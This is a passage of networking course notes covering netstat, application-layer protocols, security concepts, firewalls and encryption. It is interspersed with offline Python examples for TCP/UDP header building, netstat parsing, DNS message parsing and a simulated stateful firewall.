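def tcp_flags(hdr: TcpHeader) -> list:
    return [name for name, bit in FLAGS.items() if hdr.flags & bit]


def checksum_ok(src_ip, dst_ip, proto, segment: bytes) -> bool:
    """Receiver-side check: the sum over pseudo-header + segment (checksum included) must be 0."""
    return ones_complement_sum(pseudo_header(src_ip, dst_ip, proto, len(segment)) + segment) == 0


def build_udp(src_ip, dst_ip, src_port, dst_port, payload: bytes) -> bytes:
    length = 8 + len(payload)
    hdr = struct.pack("!HHHH", src_port, dst_port, length, 0)
    csum = ones_complement_sum(pseudo_header(src_ip, dst_ip, 17, length) + hdr + payload)
    return struct.pack("!HHHH", src_port, dst_port, length, csum or 0xFFFF) + payload  # 0 means "no checksum"


def parse_udp(datagram: bytes) -> UdpHeader:
    return UdpHeader(*struct.unpack("!HHHH", datagram[:8]))


def three_way_handshake(client_isn=1000, server_isn=5000, client_port=4456, server_port=80):
    """SYN, SYN+ACK, ACK with the sequence/ack arithmetic from the notes:
    each SYN consumes one sequence number, and ack = next byte expected."""
    syn = build_tcp(CLIENT_IP, SERVER_IP, client_port, server_port, client_isn, 0, ["SYN"])
    syn_ack = build_tcp(SERVER_IP, CLIENT_IP, server_port, client_port, server_isn, client_isn + 1, ["SYN", "ACK"])
    ack = build_tcp(CLIENT_IP, SERVER_IP, client_port, server_port, client_isn + 1, server_isn + 1, ["ACK"])
    return [syn, syn_ack, ack]


if __name__ == "__main__":
    for seg in three_way_handshake():
        h = parse_tcp(seg)
        print(f"{h.src_port}->{h.dst_port} {tcp_flags(h)} seq={h.seq} ack={h.ack}")
```

The checksum only catches accidental corruption; it is not a security control, since anyone who can alter a segment can recompute it. Also note that parse_tcp trusts the data offset, so a real parser must bound-check it against the segment length before reading options.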
- Netstat
- Demonstration of netstat
- netstat -bao (Windows; -b shows the executable, -a all sockets, -o the owning PID)
- Gives the process ID and the sockets each application is using
- Columns:
- Proto: the transport protocol (TCP or UDP)
- Local Address: the address the socket is bound to, with the port after the colon; 0.0.0.0 means all interfaces, 127.0.0.1 loopback only. This is where you listen from
- Foreign Address: the computer connected to, i.e. what will reply to you
- State: LISTENING means it is a server waiting for connections, ESTABLISHED means it is connected
- PID: the process ID, corresponding with Task Manager
- Sample lines:
- TCP 0.0.0.0:80 HouleASUS LISTENING 2524
- TCP 127.0.0.1:27015 www:49159 ESTABLISHED 1852 [AppleMobileDeviceService.exe]
- TCP 10.70.197.193:59718 157.56.116.200:1350 ESTABLISHED 2524 [Skype.exe]
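Reading netstat output by eye works for three lines; the check a practitioner actually wants is "which sockets accept connections from any interface, and which process owns them". The following is an added example, not from these notes: a parser for the `netstat -bao` layout (socket line followed by the bracketed executable line) that flags listeners bound to 0.0.0.0 or [::]. The sample output is constructed, in the style of the lines above, with made-up executable names and PIDs.

```python
import re

# Constructed sample in the layout of `netstat -bao` on Windows: the executable
# appears on its own bracketed line after the socket it belongs to.
SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             HouleASUS:0            LISTENING       2524
 [httpd.exe]
  TCP    0.0.0.0:3389           HouleASUS:0            LISTENING       1096
  TermService
 [svchost.exe]
  TCP    127.0.0.1:27015        www:49159              ESTABLISHED     1852
 [AppleMobileDeviceService.exe]
  TCP    10.70.197.193:59718    157.56.116.200:1350    ESTABLISHED     2524
 [Skype.exe]
  UDP    0.0.0.0:5353           *:*                                    1440
 [mDNSResponder.exe]
"""

ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+"
                 r"(?:(LISTENING|ESTABLISHED|TIME_WAIT|CLOSE_WAIT|SYN_SENT)\s+)?(\d+)\s*$")
EXE = re.compile(r"^\s*\[(.+)\]\s*$")


def split_addr(addr: str):
    """'0.0.0.0:80' -> ('0.0.0.0', 80); the port is whatever follows the last colon,
    which also works for IPv6 forms like '[::]:80'."""
    host, _, port = addr.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text: str) -> list:
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            proto, local, foreign, state, pid = m.groups()
            lhost, lport = split_addr(local)
            rows.append({"proto": proto, "local_host": lhost, "local_port": lport,
                         "foreign": foreign, "state": state or "", "pid": int(pid), "exe": None})
            continue
        e = EXE.match(line)
        if e and rows and rows[-1]["exe"] is None:
            rows[-1]["exe"] = e.group(1)   # attach the bracketed executable to the preceding socket
    return rows


def exposed_listeners(rows: list) -> list:
    """Sockets reachable from any interface rather than loopback only: the list a
    host review should justify one by one. UDP sockets have no LISTENING state,
    so any UDP socket bound to all interfaces counts."""
    return [r for r in rows
            if r["local_host"] in ("0.0.0.0", "[::]")
            and (r["state"] == "LISTENING" or r["proto"] == "UDP")]


if __name__ == "__main__":
    for r in exposed_listeners(parse_netstat(SAMPLE)):
        print(f'{r["proto"]} port {r["local_port"]} pid {r["pid"]} ({r["exe"]})')
```

On the sample this reports ports 80, 3389 and 5353; the AppleMobileDeviceService listener on 127.0.0.1 and the outbound Skype connection are correctly left out.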
- Week 10
- Application
- Provide the data
- Application layer
- Prepares the data for transport over the network
- Application Layer Protocols
- Hypertext Transfer Protocol (HTTP)
- Transfer files that make up webpages
- Secure HTTP (HTTPS)
- Secure transmission
- Post Office Protocol (POP)
- Inbound mail delivery
- Simple Mail Transfer Protocol (SMTP)
- Outbound mail delivery
- Domain Name Service (DNS)
- Resolves a server's friendly name to its IP address and vice versa
- Dynamic Host Configuration Protocol (DHCP)
- Enables devices on network to obtain an IP address
- Telnet
- Provide remote access (command line) to servers and networking devices
- File Transfer Protocol (FTP)
- Interactive file transfers between systems
- Server Message Block (SMB)
- File sharing protocol used by Microsoft Windows
- Gnutella
- Peer-to-peer (P2P) file sharing
- Applications
- Provide users with way to create the data
- Email, web browsers, file sharing, word, excel, skype
- Application layer services
- Provides interface to the network
- Prepares the data according to protocol specific steps
- Application protocols
- Define the type and syntax of messages
- Define meaning of any informational fields
- Defines the request formats and expected responses
- WWW Services and HTTP
- When a user types in a URL such as http://www.cisco.com/web-server.htm it actually contains three parts
- http: the protocol
- www.cisco.com: the server name
- web-server.htm: the specific file name requested
- HTTP
- Specifies a request/response
- GET
- Request for data
- POST and PUT
- Send data to the server (form submissions, uploads)
- Server Response Status Code
- 1xx: Informational
- Request received, continuing process
- 2xx: success
- Action was received, understood, accepted
- 3xx: Redirection
- Further action must be taken to complete request
- 4xx: client error
- Request contains bad syntax cannot be fulfilled
- 5xx: Server error
- Server failed to fulfill apparently valid request
- Application Types
- Client/Server Applications
- Describes the relationship between two programs
- One program (the client) makes requests; the other (the server) services them
- Centralized dedicated servers
- Repositories of information
- Runs processes that listen to and service requests
- P2P Application
- Peer-to-peer communications in a model of same capabilities that either can initiate communication
- Decentralized non dedicated
- Desktops used as client
- DNS Protocol
- Domain name service
- DNS is a client/server service, but a little different in that the DNS client (the resolver) runs as a background service itself
- Supports name resolution for network applications that need it
- nslookup in commandline
- The server provides name resolution using a name daemon (for example BIND's named)
- It looks in its own records and cache for the name-to-IP mapping; if it cannot find it, it sends the request on to another server (recursion up the hierarchy)
- ipconfig /displaydns shows the cached DNS entries on Windows; ipconfig /flushdns clears them
- Hierarchical system
- Top level domains
- .ca, .jp (representing countries)
- .com for commercial
- .org for organizations
- Second-level domains
- Names registered by companies and organizations under a top-level domain
- google is the second-level domain under the top-level .com
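What nslookup sends on UDP/53 and what the resolver returns is a small binary format worth being able to read, especially since the name compression in responses is where DNS parsers historically go wrong. The following is an added example, not from these notes: it builds a standard A query, builds a constructed resolver reply (answer names compressed with a pointer back to the question, as real servers do), and parses it, bounding pointer hops so a looping pointer cannot hang the parser. No network is used; the transaction ID, name and addresses are constructed.

```python
import struct


def encode_name(name: str) -> bytes:
    """www.google.com -> 3www6google3com0 (each label prefixed with its length)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(txid: int, name: str, qtype: int = 1) -> bytes:
    """Standard recursive query (flags 0x0100 = RD set) for an A record, as nslookup sends."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def decode_name(msg: bytes, offset: int):
    """Read a possibly-compressed name; returns (name, offset just past it in the stream).
    A length byte with its top two bits set (0xC0) is a 14-bit pointer to an earlier
    offset. Pointers are followed, but a bounded number of times."""
    labels, jumped, end, hops = [], False, offset, 0
    while True:
        if offset >= len(msg):
            raise ValueError("truncated name")
        length = msg[offset]
        if length & 0xC0 == 0xC0:
            if hops > 16:
                raise ValueError("compression pointer loop")
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2        # the stream continues after the 2-byte pointer
            jumped, offset, hops = True, pointer, hops + 1
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    if not jumped:
        end = offset
    return ".".join(labels), end


def parse_response(msg: bytes) -> dict:
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    offset, questions, answers = 12, [], []
    for _ in range(qd):
        name, offset = decode_name(msg, offset)
        qtype, qclass = struct.unpack("!HH", msg[offset:offset + 4])
        offset += 4
        questions.append((name, qtype))
    for _ in range(an):
        name, offset = decode_name(msg, offset)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:                       # A record: dotted quad
            rdata = ".".join(str(b) for b in rdata)
        elif rtype == 5:                                    # CNAME: another (compressible) name
            rdata, _ = decode_name(msg, offset - rdlen)
        answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "rcode": flags & 0xF, "questions": questions, "answers": answers}


def build_response(query: bytes, addresses) -> bytes:
    """Constructed resolver reply: echoes the question and answers with one A record
    per address, naming each with a pointer (0xC00C) to the question name at offset 12."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(addresses), 0, 0)   # QR, RD, RA set
    rrs = b"".join(b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4)
                   + bytes(int(o) for o in ip.split(".")) for ip in addresses)
    return header + query[12:] + rrs


if __name__ == "__main__":
    q = build_query(0x1234, "www.google.com")
    print(parse_response(build_response(q, ["142.250.80.68"])))
```

A resolver matches a reply to its query by the transaction ID and source port; because those are the only two unpredictable values in a 512-byte UDP datagram, randomizing both is what makes cache poisoning by blind spoofing impractical.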
- Email uses both POP and SMTP
- POP is used to receive email
- Receive, fetch, read
- The client issues USER, PASS, RETR, QUIT
- SMTP is used to transfer mail
- Used to send mail
- If the recipient is local the server delivers it to the mailbox on site
- If it is not local, the SMTP server does a DNS lookup (MX record) for the recipient's domain (rogers, gmail, Hotmail, etc) and relays the mail to that server
- FTP
- Port 21 is the command/control port
- Takes the commands to upload or download
- Port 20 is the data port
- To transfer the data
- FTP is not firewall friendly
- By default FTP is in active mode
- In active mode the client tells the server (PORT command) which port to use, and the server opens a second connection from port 20 back to the client: a different port, so a different socket
- A firewall or NAT in front of the client blocks that inbound connection unless a rule (or an FTP helper) is created to allow it
- Best to configure FTP for passive mode
- The client sends PASV, the server answers with a port number, and the client itself opens the data connection to the server
- Since the data connection originates from inside the firewall it is allowed like any other outbound connection
- Security
- The Tenets of Security
- Confidentiality
- Integrity
- Availability
- Definitions
- Asset
- What we are trying to protect
- Vulnerability
- Weakness or flaw
- Threat
- What we are trying to protect against (anyone or anything that can exploit a vulnerability)
- Security controls
- Safeguards to avoid, counteract, minimize security risks
- Risk
- Potential for loss, damage, destruction
- Vulnerabilities and mitigating them
- Security program
- Policies
- IT security
- Management controls
- Technical safeguards
- Operational safeguards
- Physical security
- Don’t let random people with USB keys access information
- Awareness/Training
- Security Screening
- Network Device Security Measures
- Physical Security
- Protects against
- Hardware threats
- Environmental threats
- Electrical threats
- Maintenance threats
- Limit damage to equipment
- Lock up equipment and prevent unauthorized access
- Monitor and control entry with electronic logs
- Use security camera
- Network Threats
- Malicious code
- Virus
- Software used to infect a computer
- Buried in an existing program
- When program is executed virus code is activated and copies itself to other programs
- Worm
- Does not require host program
- Enters a computer through vulnerability in system and takes advantage of file-transport or information-transport features on systems
- Trojan horse
- Malware disguised as a legitimate program so that the user installs it; does not replicate on its own
- Reconnaissance attacks
- Unauthorized discovery and mapping of systems, services, vulnerabilities
- Access attacks
- Unauthorized manipulation of data, system access, user privileges
- Denial of service
- Disabling or corruption of networks, systems, services
- Social engineering
- Tricking people into handing over access or information, bypassing the technical controls entirely
- Firewalls
- Types
- Packet filtering
- Prevents or allows access based on IP or MAC address
- Application filtering
- Prevents or allows access by specifying application types on port numbers
- URL filtering
- Prevents or allows access to websites based upon URLs or keywords
- Stateful packet inspection
- Incoming packets must be legitimate responses to requests from internal hosts
- Unsolicited packets are blocked unless permitted specifically
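The stateful rule above ("incoming packets must be replies to requests from internal hosts") is a small state machine, and it is worth seeing how it differs from a plain packet filter. The following is an added example, not from these notes: a simulated stateful firewall that records outbound flows by 5-tuple, admits inbound packets only when they match a recorded flow or an explicit inbound rule, and forgets a flow when a RST is seen. The addresses, ports and packet sequence are constructed; a real firewall also expires entries and tracks the FIN exchange, which is left out here.

```python
import ipaddress
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Packet:
    proto: str                  # "TCP" or "UDP"
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset = field(default_factory=frozenset)   # TCP flag names, e.g. {"SYN"}


class StatefulFirewall:
    """Allows anything from inside to outside and remembers the flow; lets an
    inbound packet through only if it is the reply to a remembered flow or an
    explicit inbound rule permits it. Simplified: entries never time out and are
    removed on the first RST."""

    def __init__(self, inside_net: str, allow_inbound=()):
        self.inside = ipaddress.ip_network(inside_net)
        self.allow_inbound = set(allow_inbound)     # (proto, dport) pairs, e.g. ("TCP", 25)
        self.state = set()                          # 5-tuples as seen from the inside host

    def is_inside(self, ip: str) -> bool:
        return ipaddress.ip_address(ip) in self.inside

    def filter(self, pkt: Packet) -> str:
        src_in, dst_in = self.is_inside(pkt.src), self.is_inside(pkt.dst)
        if src_in and not dst_in:
            # Only a new TCP SYN (or any UDP datagram) creates state; a stray ACK does not
            if pkt.proto == "UDP" or "SYN" in pkt.flags:
                self.state.add((pkt.proto, pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return "ALLOW outbound"
        if dst_in and not src_in:
            reply_key = (pkt.proto, pkt.dst, pkt.dport, pkt.src, pkt.sport)
            if reply_key in self.state:
                if "RST" in pkt.flags:
                    self.state.discard(reply_key)   # peer aborted: nothing more is expected
                return "ALLOW reply"
            if (pkt.proto, pkt.dport) in self.allow_inbound:
                return "ALLOW by rule"
            return "DROP unsolicited"
        return "ALLOW local"    # inside-to-inside (or outside-to-outside) traffic is not filtered here


def demo() -> list:
    """Constructed packet sequence; returns the verdict for each packet in order."""
    fw = StatefulFirewall("10.70.0.0/16", allow_inbound={("TCP", 25)})
    client, web, attacker, mailhost = "10.70.197.193", "93.184.216.34", "203.0.113.9", "10.70.197.1"
    packets = [
        Packet("TCP", client, 4456, web, 80, frozenset({"SYN"})),          # client opens a connection
        Packet("TCP", web, 80, client, 4456, frozenset({"SYN", "ACK"})),   # legitimate reply
        Packet("TCP", attacker, 40000, client, 3389, frozenset({"SYN"})),  # unsolicited RDP probe
        Packet("TCP", attacker, 40001, mailhost, 25, frozenset({"SYN"})),  # inbound mail, permitted by rule
        Packet("UDP", client, 51000, "8.8.8.8", 53),                       # DNS query out
        Packet("UDP", "8.8.8.8", 53, client, 51000),                       # DNS answer back
        Packet("TCP", web, 80, client, 4456, frozenset({"RST"})),          # server aborts the connection
        Packet("TCP", web, 80, client, 4456, frozenset({"ACK"})),          # nothing tracked any more
    ]
    return [fw.filter(p) for p in packets]


if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```

The key difference from a stateless filter is the third packet: a packet-filtering rule that "allows established traffic" by checking only the ACK bit can be fooled by setting ACK on a probe, whereas the state table requires that an inside host actually opened the flow.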
- Encryption
- Symmetric
- Confidentiality: one shared key both encrypts and decrypts
- AES, 3DES, Blowfish
- Asymmetric (public-key cryptography)
- Authentication and key exchange: the private key signs or decrypts, the matching public key verifies or encrypts
- RSA, Digital Signature Algorithm (DSA)
- Hash
- Integrity: a fixed-size one-way fingerprint of the data (e.g. SHA-256)